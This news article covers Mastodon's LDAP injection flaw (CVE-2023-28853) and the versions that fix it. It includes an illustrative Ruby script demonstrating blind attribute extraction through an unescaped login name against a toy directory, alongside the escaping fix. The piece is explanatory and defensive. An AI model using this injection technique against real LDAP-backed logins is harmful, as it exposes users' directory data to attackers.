The social network Mastodon runs on server software of the same name. Because data passed during LDAP authentication was not adequately filtered, attackers could have read individual pieces of information out of the directory.

In their security advisory, the discoverers write that the user name is not filtered, so an LDAP query can be smuggled in. Information about users could be read out bit by bit. According to the proof-of-concept description, it was not possible to obtain password hashes this way (CVE-2023-28853, CVSS 7.7, risk "high").

The discoverers therefore also describe the gap as an LDAP injection vulnerability in the login process. It makes any user attribute stored in the LDAP database accessible to attackers.
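As an added illustration of the bug class the advisory describes, and not Mastodon's own code: the filter shape, the two directory entries and the toy filter evaluator below are constructed for this example. An unescaped login name lets an attacker append an extra clause to the search filter and use the login success/failure result as a yes/no oracle to read an attribute such as `mail` one character at a time; escaping the value per RFC 4515 (the same escaping `Net::LDAP::Filter.escape` applies) turns the injected parentheses and wildcard into literal characters and closes the oracle.

```ruby
# RFC 4515 escaping of the characters that are special inside a filter value.
LDAP_ESCAPES = { "\\" => "\\5c", "*" => "\\2a", "(" => "\\28",
                 ")" => "\\29", "\0" => "\\00" }.freeze

def ldap_escape(value)
  value.gsub(/[\\*()\x00]/) { |c| LDAP_ESCAPES[c] }
end

# Hypothetical user lookup in the shape the advisory describes: the login
# name is interpolated into the filter without any filtering (vulnerable).
def vulnerable_filter(login)
  "(&(uid=#{login})(objectClass=person))"
end

# Hardened form: every special character in the login is escaped first.
def safe_filter(login)
  "(&(uid=#{ldap_escape(login)})(objectClass=person))"
end

# --- Toy directory and filter evaluator (constructed stand-in for a server).
# Supports (&...), (|...) and (attr=value) with '*' wildcards, which is all the
# attack needs; a real LDAP server accepts the same filter strings.
DIRECTORY = [
  { "objectclass" => "person", "uid" => "alice", "mail" => "alice@example.org" },
  { "objectclass" => "person", "uid" => "bob",   "mail" => "bob@example.net" },
].freeze

def unescape_value(v)
  v.gsub(/\\([0-9a-fA-F]{2})/) { $1.hex.chr }
end

def parse_node(str, pos)
  raise ArgumentError, "expected '(' at #{pos}" unless str[pos] == "("
  pos += 1
  if %w[& |].include?(str[pos])
    op = str[pos]
    pos += 1
    children = []
    while str[pos] == "("
      child, pos = parse_node(str, pos)
      children << child
    end
    raise ArgumentError, "expected ')' at #{pos}" unless str[pos] == ")"
    [[op, children], pos + 1]
  else
    close = str.index(")", pos)
    raise ArgumentError, "unterminated item at #{pos}" unless close
    attr, value = str[pos...close].split("=", 2)
    raise ArgumentError, "malformed item at #{pos}" if value.nil?
    [[:eq, attr.downcase, value], close + 1]
  end
end

def parse_filter(str)
  node, pos = parse_node(str, 0)
  raise ArgumentError, "trailing data after filter" unless pos == str.length
  node
end

# '*' is a wildcard; everything else is literal after \xx unescaping.
def match_value?(pattern, actual)
  return false if actual.nil?
  pieces = pattern.split("*", -1).map { |p| Regexp.escape(unescape_value(p)) }
  Regexp.new("\\A#{pieces.join('.*')}\\z", Regexp::IGNORECASE).match?(actual)
end

def eval_filter(node, entry)
  case node[0]
  when "&" then node[1].all? { |c| eval_filter(c, entry) }
  when "|" then node[1].any? { |c| eval_filter(c, entry) }
  when :eq then match_value?(node[2], entry[node[1]])
  end
end

def search(filter_string)
  node = parse_filter(filter_string)
  DIRECTORY.select { |entry| eval_filter(node, entry) }
end

# The oracle an attacker gets for free: does the lookup find exactly one
# entry for this login? A malformed filter just looks like a failed login.
def login_exists?(login, build_filter)
  search(build_filter.call(login)).size == 1
rescue ArgumentError
  false
end

ALPHABET = [*"a".."z", *"0".."9", "@", ".", "_", "-"].freeze

# Blind extraction: append "(attr=<prefix>*)" via the login and grow the
# prefix one character at a time while the oracle keeps saying yes.
def extract_attribute(login, attr, build_filter, max_len: 32)
  known = +""
  max_len.times do
    hit = ALPHABET.find { |c| login_exists?("#{login})(#{attr}=#{known}#{c}*", build_filter) }
    break unless hit
    known << hit
  end
  known
end

if $PROGRAM_NAME == __FILE__
  puts "vulnerable: #{extract_attribute('alice', 'mail', method(:vulnerable_filter))}"
  puts "escaped:    #{extract_attribute('alice', 'mail', method(:safe_filter)).inspect}"
end
```

Against the vulnerable filter the loop recovers `alice@example.org`; against the escaped filter every probe lands in a single `uid` value that matches nobody, so nothing leaks. The same escaping must be applied to every user-controlled value that reaches a filter, not only the login name.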

Mastodon versions from 2.5.0 onward are affected. The developers have closed the security gap in versions 4.1.2, 4.0.4 and 3.5.8.

The release notes for the three new Mastodon versions mention the vulnerability and also list Ruby version 3.0.6 as a security update; earlier Ruby versions contained a ReDoS vulnerability. Administrators of a Mastodon instance should install the updated versions as soon as possible, since the developers classify the vulnerability as high-risk.

A few weeks ago it became known that a configuration error at Mastodon had led to a data leak. That case, however, was a matter of "human error": in the course of expanding Mastodon's hardware and software, an archive server was visible to all users for several weeks.


(dmk)
